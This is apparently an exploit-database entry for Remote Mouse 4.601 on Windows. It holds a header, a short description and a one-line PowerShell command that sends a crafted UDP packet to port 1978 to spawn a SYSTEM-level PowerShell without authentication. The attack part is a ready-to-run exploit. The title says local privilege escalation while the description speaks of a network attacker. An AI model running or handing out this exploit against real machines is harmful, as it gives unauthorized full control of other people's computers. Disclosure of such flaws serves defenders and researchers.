# Exploit Title: Remote Mouse 4.601 - Local Privilege Escalation
# Date: 14/07/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.remotemouse.net
# Software Link: https://www.remotemouse.net/downloads
# Version: 4.601 (Windows)
# Tested on: Windows 10 / Windows 11
# CVE: Pending

'''
Description:

Remote Mouse 4.601 for Windows listens on UDP port 1978 and allows
privilege escalation. an attacker on the same network can spawn a
SYSTEM-level `powershell.exe`, resulting in full privilege escalation
without authentication or user interaction.

'''

powershell -command "$ip='127.0.0.1';$p='web'+'opnpowershell'.Length.ToString('000')+'opnpowershell';$b=[Text.Encoding]::ASCII.GetBytes($p);(New -Object Net.Sockets.UdpClient).Send($b,$b.Length,(New-Object Net.IPEndPoint([Net.IPAddress]::Parse($ip),1978)));Write-Host '[>] SYSTEM powershell spawned' -f Green;Start-Sleep 2"